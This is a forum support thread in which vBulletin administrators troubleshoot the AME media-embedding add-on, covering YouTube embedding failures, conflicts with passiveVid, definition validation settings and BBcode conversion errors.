I have a Big problem in my board vB 3.8.3

I have installed passiveVideo Lite for the videos but I think of installing AME's for the audio (goear) will be a good complement, so, I install AME's but makes a great problem in my board:
- The URLs are double parsed in the posts, so when I post a url like youtube.com in the WYSWYG Editor the URL appears double checked so how can I fix it? I try several times the reinstallation without sucess.

You have AME and passiveVid installed? You can't have them both installed, or you'll continue to get conflicts.

I'm not entirely sure what you should do now. You need to find a way to uninstall one or both of them completely. But you can't have both installed.

Hello. Great hack, thank you for it. I've been having some issue lately though. Most videos are being created as links, rather then embedding. To fix the issue I edit the post, highlight the video url, and remove the link. Hoping to get this resolved.

That's not an AME error, but an issue with your database:

When that goes away, action you would have taken would have put up a similar message.

As I said, I don't know what to do in this case. Uninstall one or the other and start over again from scratch is the only thing I can suggest.

When that goes away, action you would have taken would have put up a similar message.

yep, it's taking a lot of time to complete the action so the mysql server shut's the connection down, first you had to build up the query and then send it, and not build the query as when you start querying, it's taking too long to convert a lot of links so the server closes the connection.

can you please try to post more then 6 megavideo links and see that it's taking too long?
do you think that if I'll use the filecache it will work faster?

To be honest, I feel the root of your problem is that your trying to post six videos at one time. I know it's convenient to do the auto conversion thing all at once, but I think six videos is pushing it, especially from a site like MegaVideo, which runs slow to being with. I don't know that the file cache will do anything to new posts, but you can attempt it. It shouldn't hurt anything. Make sure it's CHMODed.

I had the same problem - been using this mod ever since I set up my forums and it's been working fine. Today, however I noticed that new videos (or videos in existing posts if the post is edited) are showing up as https://vborg.vbsupport.ru/external/2010/04/86.png followed by the video name. Youtube must have changed something as it has been working fine up until now but as someone else said changing the validation in AME settings sorts it. Took me a while to figure out where this was and noticed someone else posted they couldn't find this so thought I'd post instructions for anyone else to make it easy.

Login to Admin and on the left where you see AME click on the little arrow to expand the AME menu and then select Display Definitions. You'll see in the main window Youtube listed as a link. Click on the Youtube link. The very last box on the YouTube page definition is "Validation" - remove what is in this box and click on Save. You should then find that if you post a youtube video link in a post it will now appear embedded and display in the post. It doesn't change the un-embedded links to videos already posted so to change these links to embedded videos you need to edit the post to take the link out, then post the youtube url back in the post for it to be embedded.

I am having that issue as well. Funny thing is, when someone uploads a video into the video directory and they tick the box to post a thread with it, the video embeds no problem. The issue is when we try to manually post a video.

I double checked and that admincp file seems to be up to date with whats in the latest zip. Still getting a blank white screen when trying to delete all the definitions. When I resync the cache it just redirects me to the settings page and when I save the settings it redirects me back to settings. :( The only thing I can think of is that I have moved my forums to a different host but everything was transferred and continues to work.

When I go to delete all of the definitions in its own window, it says that I saved the display order, which is all 1 for some reason. I actually tried to delete all of them, I never changed their order.

yes. I made a clean install of vb 3.8.5 on my workstation with only AME 2 5 6 installed and still it doesn't work properly. When I surround link with [ame] tags its fine. Works like a charm. But AME doesn't recognize links properly when they are simply pasted into post. Do I have to make some changes in vb configuration??

When trying to convert old BBcodes I keep getting this message "You are missing the \1 parameter in at least one of your conversions"

I'm submitting "youtube" as the bbcode and "http://www.youtube.com/watch?v=\1" as the conversion. Tried everything and can't get it to work. Anyone have any ideas?
Still have the same issue. I re-downloaded and re-installed AME and same issue persists. I kept all the default conversions without altering anything and it gives the same issue. I also tried the youtube conversion listed above and I'm 100% sure there are no spaces, commas, or any other funky characters. Same issue.

I altered the php of the admin file to remove the checks and it will bypass the error, but verbose mode shows the bbcodes being updated incorrectly. It basically shows that where the data that's supposed to replace the "\1" part is not getting updated so I don't want to run an actual conversion until I get it straight. I've since reverted the admin file back to original and the "You are missing the \1 parameter in at least one of your conversions" error is back again.

I'll keep messing with it but I'd love some ideas of what else I could try.

I just turned cached posts on on our server as it's been slow lately when we're busy (400+ simultaneous users) but it's stopped the AME working now.

Well, I couldn't wait any more and since no one seemed to have any input on this issue I just manually created a SQL query to replace the old BBcodes with the new AME one. Took several hours of manual entry but at least it got done.

To whoever is currently maintaining this mod, I do believe it is a flaw somewhere in the code. Perhaps it's a PHP version conflict or something, but I am 100% sure that I had the fields filled correctly. Hell, even the DEFAULT entries produced the same error without any change. It might be a fluke error but I would suggest looking into it as I'm not the only one who has experienced it and perhaps others will in the future too.

This just stopped working by itself, no changes made. Made sure we're using the latest version. using vBulletin 3.8.4.

YouTube links used to convert to embedded video containers, but now only display an icon and a link to the video.

Verified the Validation field under YouTube is still empty. Verified the default settings are still in use, the same ones that used to work.

If I wrap the YouTube link in [ame] tags it works just fine. It just seems to no longer automatically convert these. Any ideas?

There is nothing in the Validation Code box in my install. It's blank. So there is nothing to remove. The new YouTube URLs have broken this encoder.

When I tried this, putting ame tags around the link, my system just changed the ame tags to url tags automatically.

ok so a couple of weeks ago youtube stopped embedding automatically and now just posts links. my AME has been working fine for a long time

I can embed youtube by using the embed code inside the [youtube] wrappers, but that defeats the entire purpose


before you ask, nothing has been changed on my site and videos from other places still work, vimeo etc

Sounds like YouTube has made changes which breaks this script. Without the conversion links to embedded videos there's no point in using this.

This is TOTALLY incompatible with passiveVid. Installing them together will create a HOST of issues you may not be able to undo. Besides, AME supports about a hundred more sites than passiveVid currently does. You just need to get them from my add on.

Installed AME 2.5 and imported DJ's Master XML (Delta).xml for 2.5

YouTube is working (wasent imported since it was alreay there).

Both AME and passiveVid make changes to your post table. Do a search of this thread for passivevid and you'll see the number of problems that users encountered trying to run them together. On a side note, AME does not leave [AME] BBCode, provided you run the conversion script prior to uninstalling.

So far not one has let me look at their forum Admin CP to take a closer look at this problem. There's been no change in YouTube or the definition that should keep this from working. There's no other reason why it shouldn't be working. Whatever it is must be unique to your individual forums.

I just went and searched and I found nothing except the double video issue that is *easily* fixed. As I said, I am running them both on a test site and as long as you deactivate the video sites that passivevid uses on AME then it works fine. I don't know why you guys keep saying otherwise.

So far it doesn't look like there are any conflicts as long as you make one simple change.

Sorry, AME is over-all a superior product but for Youtube passiveVid is better. If there are no negative side effects other than the easily fixed double video issue then I'm running both on my live site...

I am having youtube issues too. When i put a link into a post, all i get is the link now. I have tried all of the suggestions in DJ's thread and nothing seems to be working. Any chance you can look at the code and see what's causing the link to post instead of the video? There are a bunch of people having issues. I know you are busy with other project's but this repair would be greatly appreciated.

No? Maybe it's in the AME 2.0 thread. I know I tried it recently and was able to correct the problem on my site, although, it was language specific. Also, try searching one of my last two definitions threads. I know it's here somewhere.

I use BBcode to embed my files since HTML is not allowed in forum. I've tried it both ways even enabling HTML and trying just URL's.

I tried looking through all the posts in here and in DJ's thread, but I was unable to find an answer, so I decided to post my problem in both threads... I couldn't figure out if I have an AME problem, or a problem with the definitions.

I have had the AME 2.5 installed for a long time now (on VB 3.8.5) and in order for just the regular YouTube to convert, I must have "extract destination data" turned off in the main settings. Turned on, YouTube won't convert at all. I have tried to turn on the "extract desitination data" in the main settings, and turn it off on the YouTube definition itself, but it still won't work unless it's off in the main settings. Just today I decided to install DJ's definitions, and none of them will convert at all, with the Extract Destination Data turned on or off. I have tried at several different sites to be sure (ESPN.com, CBSNews.com, Hulu, Gamesopoly) and made sure that embedding was allowed on all links, still nothing will convert, just the URL gets posted.

I assume it's me... I'm not the most proficient at all this. I did re-install AME 2.5, and did an overwrite of all files and xml, still to no avail. Any other info you need to help me, I would be glad to provide! Thanks.

Whenever AME generates a title for a YouTube video via "extract destination data" it includes HTML/character entities (Example YouTube Title: "YouTube- &#x202a;'How to Train Your Dragon' Trailer HD&#x202c;&lrm;") in the title text along with the video title. It is doing this for all YouTube video titles regardless of any characters in the YouTube video page title.

Did something change at YouTube? Anyone know a fix for this?

Yes, under Settings in your AME CP there are fields to set the Height and Width of videos for each of the different regions videos appear in. They can also be set individually in each definition by editing the embed code.

Presuming you have the most recent definition, you just need to allow Extraction. If you have that disabled it won't pull the title.

It is doing this for all YouTube video titles regardless of any characters in the YouTube video page title.

AME doesn't always convert the special characters included in some YouTube titles. There's a file you can edit, I don't quite remember at the moment which, where you can get it to accept certain characters, but it will still not convert a few because you can only set it to one type of encoding.

Yes, check the add-on for the JW Player and check the other add-on which includes defs for local hosted media.

Problem Solved. I reinstalled it.
If your using the default def, it's a bit out of date and may not work for all links. Try installing the most updated definition from my thread and re-editing posts that did not convert initially.

Does this display Thumbnails first for youtube videos similar to Goldbrick? That was one thing I REALLY liked about goldbrick was the clickable thumbnail from Youtube that also displayed the link title and opened the video in view in the center of the screen. Otherwise your video has to be dependant on the width of your thread template. Deal breaker IMO. Does this mod have that ability?

We are actually certain this was the culprit now that it has been removed and the malicious code is no longer a problem. Here is the malicious code it was injecting:

Of course we got several warnings from Google who was blocking some of our pages due to the malicious code.

We tried to convert the AME code back to normal URL's prior to removing the product, but it would not work. We have removed it, but now those posts have the tags wrapped around a media link and we would like to remove them and not have to do it manually.

Is there an SQL query we can run that will remove all instances of [ame] and ?

I recently ran a "rebuild post cache" maintenance routine and it disabled most if not all old YouTube vid links in AME. If I click on the post's edit button and then save it puts the vid back in the post. Otherwise it's just missing.

I know there are some tools, but I'm not sure which one to run to re-apply the mod to my existing posts. And, the warnings there kind of scared me off just giving it a try to see what happens.

Could you scale that learning curve for me and let me know which tool to use and how to apply it?

PS. I'm using VB 3,7.3 and AME 2.5.6 and the stock YouTube definition and nothing else.

We do have one plugin ahead of where AME would be, but it is an Admin plugin, so there may have not been access available.

Yeah it looks like that's the same one I have, but it seems to fail far more often than in the past and I haven't figured out why yet. I guess I need to take some time to look at Amazon links and understand how the replacement definitions work. I opened a ticket with vBulletin and here is their response:

We're not aware of any vulnerability within vBulletin 3.8.6 for this however any issue with a plugin will relate specifically to their code. vBulletin just gives the code a 'hook' to attach to and allow it to run during a particular process - we do nothing specifically with a plugin's code.

Exactly what I suspected... neither party wants to accept responsibility or apparently even investigate if they have an security issue.

I've got a problem with youtube.
I suddenly only see an icon with the link behind it, but film won't embed.

When I try to embed this link for example:

When I put my mouse over it, it says:

How can I fix this? I already tried reinstalling the product and also deleting all definitions and importing new ones.

When I disable extraction globally and edit/save a post, the video's become embedded double with some strange text between them. When enabling extracting globally, only icons with links remain. This goes for ALL youtube video's.

I'm using VBulletin 3.8.5. and Ame 2.5.

My own question regarding self hosted video (i.e., wmv) on what folks may be doing here in conjunction with AME.

Currently, I have a /videos directory for which I upload such files. Then use the AME internal linking to present. Recommendations on implementing access to non-admins? Just create an FTP account for that folder only? Is there a hack (e.g., downloadsII) that could be mated in combination for a non-admin (general ugroup)?

Is there a way to "cutoff" the container title text after, let's say 50 characters?

If it is longer than 60 characters on my style, it goes to a 2nd line and due to my images used, they are not multiple line friendly. Please let me know if there's a way to "cutoff" text and add something like "..." to the end to show there is more to the title. Thanks!

Okay I think I have found the problem. If you take a shortened Amazon link, like those you get from a Google search, it works just fine. The syntax is usually http://www.amazon.com/product-name-here/dp/JDISHIOEHO and AME turns it into http://www.amazon.com/product-name-here/dp/JDISHIOEHO?tag=youraffiliatecode-20 . This validates using Amazon link checker just fine.

The problem arises if you use a longer Amazon link, like the ones you get when you search for an item at Amazon.com. These URLs already have a question mark in them, like ?ie=UTF8&blahblah . If you copy that, the AME appends ?tag=youraffilaitecode-20 to the end of the URL. This will not validate using the Amazon link checker, presumably because two question marks appear in the URL.

You can make it validate by appending &tag=youraffiliatecode-20 to the end of the URL instead. The problem is this syntax will not validate with the shorter URL format you might copy off Google.

All is fine if you are the only one putting Amazon links on your forum, but of course you want it to automatically append the right tag for whatever type of Amazon link a user might post.

Anyone handy with definitions have an idea on how to use ?tag= for shorter Amazon links and &tag= for the longer types that have a ? in the URL already? Maybe two separate ones?

One possible idea is that you append this to the end of any url ?tag=youraffiliatecode-20&tag=youraffiliatecode-20 . This seems like it works in limited testing, but I'm not all that familiar with AME definitions and Amazon URL formats to say for sure. Sometimes redundancy is good, sometimes it is not...

Okay, I'm referring to this post (https://vborg.vbsupport.ru/showpost.php?p=2065988&postcount=754) in the AME 3 thread by The Geek. For a while now I've wanted to delve into an existing product to assist in my own personal studies of PHP and vB mod development. But I need a good reason to spend that time on it. I was going to ask The Geek first, but wasn't sure I could get in contact with him now that he's not longer involved in vBulletin coding. But it seems he's left the code open for anyone to try and continue development. To keep AME alive. I wish to do that. I wish to keep AME going for the foreseeable future. So while I can't guarantee a timeline, I am going to try and do my own second generation release of the AME code to try and keep this great product alive. I need to spend some time reviewing the code, understanding the fundamentals. But I intend to try to keep this product from fading away. Don't know if that will include vB4 development, at least not at first, but I will look into. Hope you can bear with me.

It should look just like your category headers, but it's possible you have something overriding the text of the div that contains posts. Try adding a style="color:color name/#number" to that table cell in the container template and see if it changes anything.

That's a "nomedia" icon. It's for definitions that detect for when a video will not embed and displays the image next to a plain text link.

Only works if the definition for a specific site is designed to check for validation. YouTube was like that for time, before people starting having trouble with it always failing validation. I generally don't design defs to check for that unless it's really necessary. I had to do that for Flickr, if I remember correctly.

Users can't control the auto play feature using the YouTube or any other definition. It's determined in the embed code, and even the up to date definitions in my thread don't have it set to auto play, so I don't see how they could be setting anything.

Are you on shared hosting? is it possible you were close to your disk space or database max and this mod put you over the edge? Do you have some way to check available memory/disk space?

I don't have vBDynamics myself, but I do have vBAdvanced and it works fine with it. I don't know how vBD works, or if uses the same database tables as posting or what have you. It would depend on that and if the BBCode parser and basic vBulletin hooks are used during the process of posting.

As far as I know, AME 2.5 isn't compatible with vB4. You would need to see if you can upgrade to AME 3 do with the handful of built-in definitions for it.

I've never seen a php line start with a single slash... looks like you might have tried to comment it out "//" before but had the single slash as a typo- the single slash could be causing your error.

I might have missed the answer in the other 50 some odd pages, but how do I get the mod to allow more then 1 to be embedded, say I post 2 videos on one post how do i get both to show up, only 1 link per post is showing up for me.

AME needs to check the text before it gets saved. Check the plugins and you will see how AME gets called when posts or blogs and such get saved.

I set my width to: 640 and height to: 385, I believe that matches the widescreen youtube settings.

Unfortunately with the new shorter youtube URLs I can no longer check if embedding is allowed anymore. If I attempt to "validate" it always fails with a "302" error- must be from youtu.be forwarding to youtube.com. If anyone knows how to get validation working on the shorter URLs please let me know.

Doesn't work for me either on 3.8.5, however the couple of video's that I have come across with the new youtu.be thingy are still youtube.com in the address bar so I just use the link from the address bar and it works fine.

Probably could be more efficient but it works for me. Even does a custom start time if you append #t=90 to the URL where 90 is the start time in seconds.

It worked fine. But I think I see what might be the issue... The period in youtu.be I didn't 'escape' - that is it should be youtu\.be in the code. Some versions of php might require this while others don't.

I made this change and this is the updated definition. Delete the old one.

Nope, I tried the one from snakes, then uninstalled it, tried your first one, uninstalled it and tried your 2nd one.
2) Are you sure this definition IS set to active?Yip, it's active, just the "Extract Info" column doesn't have a tick in it, but I tried it both with and without but it didn't make any difference. I even tried a bit of mix and match with snakes code but this sort of coding is way out of my league. :p
